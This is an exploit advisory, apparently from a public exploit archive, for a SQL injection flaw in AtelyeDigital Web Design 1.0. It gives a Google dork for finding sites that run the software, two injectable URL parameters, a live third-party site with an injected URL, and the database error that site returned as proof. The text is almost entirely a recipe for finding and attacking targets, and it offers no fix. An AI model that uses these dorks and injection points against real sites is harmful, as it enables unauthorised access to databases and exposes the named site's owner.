AtelyeDigital Web Design version 1.0 suffers from a remote SQL injection vulnerability.
eb08086917e3bf86eac6d24c52101853
#########################################################
# Exploit Title : AtelyeDigital Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : atelyedigital.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 1.0
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060019
#########################################################
AtelyeDigital.Com Web Design and Development SQL Injection Vulnerability
#########################################################
# Google Dork : intext:''Atelye Digital''
# Exploit : /news.asp?id=[SQL Injection]
# Exploit : /default.asp?Kno=[SQL Injection]
#########################################################
# Example Site =>
thedem.com.tr/tr/news/news.asp?id=116%27
=> [ Proof of Concept for SQL Inj ] => archive.is/08T1s
# SQL-DB Error =>
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver]
Syntax error in string in query expression 'id = 116''.
/tr/news/news.asp, line 18
#########################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#########################################################